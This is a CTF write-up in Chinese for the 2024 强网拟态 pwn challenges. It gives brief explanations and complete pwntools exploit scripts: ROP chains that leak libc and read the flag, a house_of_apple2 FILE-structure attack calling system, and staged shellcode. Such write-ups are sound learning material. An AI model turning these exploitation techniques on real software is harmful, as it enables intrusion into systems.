强网拟态2024

PWN

• signin
• signin_revenge
• ezcode
• guest book
• QWEN (复现)
• ker (复现)

signin

在add功能中存在栈溢出, 打栈溢出就好了
对随机数由于是srand(0),进行模拟就好

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *

io_ch=1
de_bug=0
url='127.0.0.1'#'210.44.150.15'
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    io = remote("pwn-66c60f581f.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    pass
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    elf=ELF(filename)
    libc=ELF('./libc.so.6')
# - - - - - - - - - - - - - #
s   = lambda content : io.send(content)
sl  = lambda content : io.sendline(content)
sa  = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc  = lambda number : io.recv(number)
ru  = lambda content : io.recvuntil(content)
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
pop_rdi = 0x0000000000401893
pop_rsi = 0x2601f
pop_rdx = 0x142c92
# - - - - - - - - - - - - - #

def cmd(c):
    sa(">> ",p32(c))
def add(idx,data=b'A',ptr=b'A'):
    cmd(1)
    sa("Index: ",p32(idx))
    sa("Note: ",data)
    sleep(0.1)
    sl(ptr)
def free(idx):
    cmd(2)
    sla("Index: ",str(idx))
def show(idx):
    cmd(4)
    sla("Index: ",str(idx))
# - - - - - - - - - - - - - #
def pwn_exp():
    print('PWN')
    p1 = b'\x00'*10+p32(0)*2
    s(p1)
    for _ in range(0,100):
        v = r_l.rand()%100+1
        sa("Input the authentication code:",p64(v))
   p2=b'A'*0x108+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x4013c0)
    add(0,b'A',p2)
    sleep(0.1)
    ru(b'\x0a')
    libc.address = u64(io.recv(6).ljust(8,b'\x00'))-libc.sym.read
    p3 = b'a'*0x108+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    sl(p3)
    sleep(0.1)
    p4=b'a'*0x120+p64(0x4013EF)*8
    p4+=p64(pop_rdi)+p64(0)+p64(pop_rsi+libc.address)+p64(0x404200)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404200)+p64(pop_rsi+libc.address)+p64(0)+p64(pop_rdx+libc.address)+p64(0x0)+p64(libc.sym.open)
    p4+=p64(pop_rdi)+p64(3)+p64(pop_rsi+libc.address)+p64(0x404700)+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
   p4+=p64(pop_rdi)+p64(0x404700)+p64(pop_rsi+libc.address)+p64(0)+p64(libc.sym.puts)
    sl(p4)
    pause()
    p5=b'./flag\x00'
    sl(p5)
    
    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))
if __name__=="__main__":
    pwn_exp()
    io.interactive()

signin_revenge

直接栈溢出了这下

比signin简化了一些, revenge?

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *

io_ch=1
de_bug=1
url='127.0.0.1'#'210.44.150.15'
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    io = remote("pwn-4c5ea24842.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    elf=ELF(filename)
    libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #
s  = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #
pop_rdi = 0x0000000000401393
pop_rsi = 0x2601f
pop_rdx = 0x142c92
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #

def pwn_exp():
    print('PWN')
    ru("lets move and pwn!")
    p2=b'A'*0x108+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(0x4012c0)
    sl(p2)
    sleep(0.1)
    ru(b'\x0a')
    libc.address = u64(io.recv(6).ljust(8,b'\x00'))-libc.sym.read
    p3 = b'a'*0x108+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    sl(p3)
    sleep(0.1)
    p4=b'a'*0x120+p64(0x4012EF)*8
    p4+=p64(pop_rdi)+p64(0)+p64(pop_rsi+libc.address)+p64(0x404200)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404200)+p64(pop_rsi+libc.address)+p64(0)+p64(pop_rdx+libc.address)+p64(0x0)+p64(libc.sym.open)
    p4+=p64(pop_rdi)+p64(3)+p64(pop_rsi+libc.address)+p64(0x404700)+p64(pop_rdx+libc.address)+p64(0x300)+p64(libc.sym.read)
    p4+=p64(pop_rdi)+p64(0x404700)+p64(pop_rsi+libc.address)+p64(0)+p64(libc.sym.puts)
    sl(p4)
    pause()
    p5=b'/flag\x00'
    sl(p5)

    #log.info('#---#---#---#---#')

    #libc=LibcSearcher("gets",gets_Addr);

    #log.success('libc.address:'+hex(libc.address))

    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":

    pwn_exp()
    io.interactive()

guest book

glibc为2.35
先是正常的泄露libc
直接整形溢出编辑_IO_2_1_stdout_, 打house_of_apple2

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *
from pwncli import IO_FILE_plus_struct

io_ch=1
de_bug=1
url='127.0.0.1'#'210.44.150.15'
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    io = remote("pwn-521faf0d6e.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    elf=ELF(filename)
    libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #
s  = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
def cmd(c):
    sla("[+] 5.exit",str(c))
def add(idx,size):
    cmd(1)
    sla("index",str(idx))
    sla("size",str(size))
def edit(idx,data):
    cmd(2)
    sla("index",str(idx))
    sa("content",data)
def free(idx):
    cmd(3)
    sla("index",str(idx))
def show(idx):
    cmd(4)
    sla("index",str(idx))
# - - - - - - - - - - - - - #

def pwn_exp():
    print('PWN')
    add(0,0x500)
    add(1,0x500)
    free(0)
    add(2,0x520)
    show(0)
    ru(b'\x0a')
    libc.address = u64(io.recv(6).ljust(8,b'\x00'))-0x7d479881b110+0x7d4798600000
    edit(0,b'A'*0x10)
    show(0)
    ru(b'A'*0x10)
    heap_1 = u64(io.recv(6).ljust(8,b'\x00'))+1312
    add(12,0x510)
    fake_io = IO_FILE_plus_struct()
    fake_io.flags = 0x2f6e69622f3b1111
    fake_io._IO_read_ptr = 0x6873
    fake_io._IO_write_base = 0
    fake_io._IO_write_ptr = 1
    fake_io.chain = libc.sym['system']
    fake_io.vtable = libc.sym['_IO_wfile_jumps']
    fake_io._codecvt = libc.sym['_IO_2_1_stdout_']#_wide_data->_wide_vtable A+0xe0
    fake_io._wide_data = libc.sym['_IO_2_1_stdout_']-0x48 # A
    fake_io._lock = heap_1
    p = bytes(fake_io)
    print(len(p))
    edit(-8,p)
    
    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":

    pwn_exp()
    io.interactive()

ezcode

主要shellcode比较难搓
最初一直计划将dx改大,但是拼尽全力无法战胜
然后发现如果我们第二次写入7个字节,我们可以利用jmp跳转过去,对已经执行过的区域进行修改后的再次执行

#!/usr/bin/env python3
# -*-coding:utf-8 -*-
from pwn import*
from ctypes import *
from LibcSearcher import *
from pwncli import IO_FILE_plus_struct

io_ch=1
de_bug=1
url='127.0.0.1'#'210.44.150.15'
port=9999#35942
arch='amd64'
filename='./pwn'
context(log_level = 'debug',os='linux',arch=arch)
context.terminal = ['tmux','splitw','-h']
if io_ch==1:
    #io=remote(url,port)
    remote("pwn-04c8177097.challenge.xctf.org.cn", 9999, ssl=True)
else:
    #io=process(["qemu-aarch64-static","-g","1234","./pwn"])
    io=process(filename)
    if de_bug==1:
        gdb.attach(io)
if filename!='':
    elf=ELF(filename)
    libc=ELF('./libc.so.6')

# - - - - - - - - - - - - - #
s  = lambda content : io.send(content)
sl = lambda content : io.sendline(content)
sa = lambda content,send : io.sendafter(content, send)
sla = lambda content,send : io.sendlineafter(content, send)
rc = lambda number : io.recv(number)
ru = lambda content : io.recvuntil(content)
rcg = lambda : u64(rc(6).ljust(8, b'\x00'))
r_l = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)
# - - - - - - - - - - - - - #

# - - - - - - - - - - - - - #
shellcode = '''
mov dx,7
mov ax,10
mov rdi,r15
syscall
mov esi,ecx
xor eax,eax
xor edi,edi
jmp $-8
'''
s1 = '''
mov edx,ebx
xor eax,eax
syscall
'''

orw = '''
mov rdi,rsi
xor rsi,rsi
xor rdx,rdx
mov rax,2
syscall
mov rdi,3
mov rsi,r15
add rsi,0x500
mov rdx,0x100
mov rax,0
syscall
mov rdi,1
mov rax,1
syscall
'''
# - - - - - - - - - - - - - #

def pwn_exp():
    print('PWN')
    shell_code = asm(shellcode).ljust(0x16,b'\x90')
    payload = b'{"shellcode":"'+(shell_code.hex()).encode()+b'"}'
    sl(payload)
    ru("loaded!")
    p = asm(s1)
    sl(p)
    pause()
    orw_ = b'flag\x00'+asm(orw)
    sl(orw_)

    
    #log.info('#---#---#---#---#')
    #libc=LibcSearcher("gets",gets_Addr);
    #log.success('libc.address:'+hex(libc.address))
    #log.success('elf.address:'+hex(elf.address))

if __name__=="__main__":

    pwn_exp()
    io.interactive()